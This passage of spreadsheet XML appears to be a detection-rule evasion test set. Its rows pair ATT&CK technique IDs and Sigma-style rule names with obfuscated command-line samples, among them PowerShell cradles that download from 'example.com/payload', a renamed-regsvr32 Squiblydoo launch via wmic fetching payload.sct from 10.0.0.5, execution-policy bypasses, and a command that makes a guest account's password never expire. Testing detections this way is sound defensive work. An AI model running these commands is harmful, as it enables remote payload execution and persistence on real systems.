        <v>0</v>
      </c>
      <c r="I4549" s="43" t="n"/>
      <c r="J4549" s="43" t="n"/>
      <c r="K4549" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4550" ht="15.75" customHeight="1" s="42">
      <c r="A4550" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4550" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4550" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4550" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -"ep" bypass -Command "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F4550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4550" s="43" t="n"/>
      <c r="J4550" s="43" t="n"/>
      <c r="K4550" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4551" ht="15.75" customHeight="1" s="42">
      <c r="A4551" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C4551" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D4551" s="43" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E4551" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F4551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4551" s="43" t="n"/>
      <c r="J4551" s="43" t="n"/>
      <c r="K4551" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4552" ht="15.75" customHeight="1" s="42">
      <c r="A4552" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C4552" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D4552" s="43" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E4552" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$wc = New-Object ('Net.W' + 'ebClient'); $wc.DownloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F4552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4552" s="43" t="n"/>
      <c r="J4552" s="43" t="n"/>
      <c r="K4552" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4553" ht="15.75" customHeight="1" s="42">
      <c r="A4553" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C4553" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D4553" s="43" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E4553" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('Net.W' + 'ebClient'); $wc.DownloadString('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F4553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4553" s="43" t="n"/>
      <c r="J4553" s="43" t="n"/>
      <c r="K4553" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4554" ht="15.75" customHeight="1" s="42">
      <c r="A4554" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C4554" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D4554" s="43" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E4554" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F4554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4554" s="43" t="n"/>
      <c r="J4554" s="43" t="n"/>
      <c r="K4554" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4555" ht="15.75" customHeight="1" s="42">
      <c r="A4555" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C4555" s="43" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D4555" s="43" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E4555" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "audit_tool.exe --s^canner a^clcheck"</t>
        </is>
      </c>
      <c r="F4555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4555" s="43" t="n"/>
      <c r="J4555" s="43" t="n"/>
      <c r="K4555" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4556" ht="15.75" customHeight="1" s="42">
      <c r="A4556" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4556" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4556" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4556" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F4556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4556" s="43" t="n"/>
      <c r="J4556" s="43" t="n"/>
      <c r="K4556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4557" ht="15.75" customHeight="1" s="42">
      <c r="A4557" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B4557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C4557" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D4557" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E4557" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F4557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4557" s="43" t="n"/>
      <c r="J4557" s="43" t="n"/>
      <c r="K4557" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4558" ht="15.75" customHeight="1" s="42">
      <c r="A4558" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4558" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4558" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4558" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class Win32_UserAccount -Filter "Name='guest'" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4558" s="43" t="n"/>
      <c r="J4558" s="43" t="n"/>
      <c r="K4558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4559" ht="15.75" customHeight="1" s="42">
      <c r="A4559" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4559" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4559" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4559" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "Get-WmiObject -Class Win32_Service -Filter "Name='spooler'""</t>
        </is>
      </c>
      <c r="F4559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4559" s="43" t="n"/>
      <c r="J4559" s="43" t="n"/>
      <c r="K4559" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4560" ht="15.75" customHeight="1" s="42">
      <c r="A4560" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4560" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4560" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4560" s="43" t="inlineStr">
        <is>
          <t>powershell -NoPROfIle -c "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4560" s="43" t="n"/>
      <c r="J4560" s="43" t="n"/>
      <c r="K4560" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4561" ht="15.75" customHeight="1" s="42">
      <c r="A4561" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C4561" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D4561" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E4561" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F4561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4561" s="43" t="n"/>
      <c r="J4561" s="43" t="n"/>
      <c r="K4561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4562" ht="15.75" customHeight="1" s="42">
      <c r="A4562" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C4562" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D4562" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E4562" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F4562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4562" s="43" t="n"/>
      <c r="J4562" s="43" t="n"/>
      <c r="K4562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4563" ht="15.75" customHeight="1" s="42">
      <c r="A4563" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C4563" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D4563" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E4563" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F4563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4563" s="43" t="n"/>
      <c r="J4563" s="43" t="n"/>
      <c r="K4563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4564" ht="15.75" customHeight="1" s="42">
      <c r="A4564" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C4564" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D4564" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E4564" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F4564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4564" s="43" t="n"/>
      <c r="J4564" s="43" t="n"/>
      <c r="K4564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4565" ht="15.75" customHeight="1" s="42">
      <c r="A4565" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C4565" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D4565" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E4565" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F4565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4565" s="43" t="n"/>
      <c r="J4565" s="43" t="n"/>
      <c r="K4565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4566" ht="15.75" customHeight="1" s="42">
      <c r="A4566" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C4566" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D4566" s="43" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E4566" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F4566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4566" s="43" t="n"/>
      <c r="J4566" s="43" t="n"/>
      <c r="K4566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4567" ht="15.75" customHeight="1" s="42">
      <c r="A4567" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C4567" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D4567" s="43" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E4567" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtIOnpOLiCY Bypass -"File" C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F4567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4567" s="43" t="n"/>
      <c r="J4567" s="43" t="n"/>
      <c r="K4567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4568" ht="15.75" customHeight="1" s="42">
      <c r="A4568" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_progname</t>
        </is>
      </c>
      <c r="C4568" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names</t>
        </is>
      </c>
      <c r="D4568" s="43" t="inlineStr">
        <is>
          <t>efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6</t>
        </is>
      </c>
      <c r="E4568" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -fiLe C:\Windows\Temp\system_update.ps1</t>
        </is>
      </c>
      <c r="F4568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4568" s="43" t="n"/>
      <c r="J4568" s="43" t="n"/>
      <c r="K4568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4569" ht="15.75" customHeight="1" s="42">
      <c r="A4569" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4569" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4569" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4569" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:/Windows/Temp/script.ps1</t>
        </is>
      </c>
      <c r="F4569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4569" s="43" t="n"/>
      <c r="J4569" s="43" t="n"/>
      <c r="K4569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4570" ht="15.75" customHeight="1" s="42">
      <c r="A4570" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4570" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4570" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4570" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F4570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4570" s="43" t="n"/>
      <c r="J4570" s="43" t="n"/>
      <c r="K4570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4571" ht="15.75" customHeight="1" s="42">
      <c r="A4571" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4571" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4571" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4571" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecUTiONpolicY Bypass -"File" C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F4571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4571" s="43" t="n"/>
      <c r="J4571" s="43" t="n"/>
      <c r="K4571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4572" ht="15.75" customHeight="1" s="42">
      <c r="A4572" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_script_exec_from_temp</t>
        </is>
      </c>
      <c r="C4572" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder</t>
        </is>
      </c>
      <c r="D4572" s="43" t="inlineStr">
        <is>
          <t>a6a39bdb-935c-4f0a-ab77-35f4bbf44d33</t>
        </is>
      </c>
      <c r="E4572" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -"File" C:\Windows\Temp\script.ps1 -Comment " &gt; "</t>
        </is>
      </c>
      <c r="F4572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4572" s="43" t="n"/>
      <c r="J4572" s="43" t="n"/>
      <c r="K4572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4573" ht="15.75" customHeight="1" s="42">
      <c r="A4573" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C4573" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D4573" s="43" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E4573" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F4573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4573" s="43" t="n"/>
      <c r="J4573" s="43" t="n"/>
      <c r="K4573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4574" ht="15.75" customHeight="1" s="42">
      <c r="A4574" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4574" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4574" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4574" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "cmd.exe"  /Run</t>
        </is>
      </c>
      <c r="F4574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4574" s="43" t="n"/>
      <c r="J4574" s="43" t="n"/>
      <c r="K4574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4575" ht="15.75" customHeight="1" s="42">
      <c r="A4575" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4575" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4575" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4575" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe "/EXEFilename" cmd.exe "/Run"</t>
        </is>
      </c>
      <c r="F4575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4575" s="43" t="n"/>
      <c r="J4575" s="43" t="n"/>
      <c r="K4575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4576" ht="15.75" customHeight="1" s="42">
      <c r="A4576" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4576" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4576" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4576" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename cmd.exe -Run</t>
        </is>
      </c>
      <c r="F4576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4576" s="43" t="n"/>
      <c r="J4576" s="43" t="n"/>
      <c r="K4576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4577" ht="15.75" customHeight="1" s="42">
      <c r="A4577" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_remote_execution</t>
        </is>
      </c>
      <c r="C4577" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Remote Command Execution</t>
        </is>
      </c>
      <c r="D4577" s="43" t="inlineStr">
        <is>
          <t>b1f73849-6329-4069-bc8f-78a604bb8b23</t>
        </is>
      </c>
      <c r="E4577" s="43" t="inlineStr">
        <is>
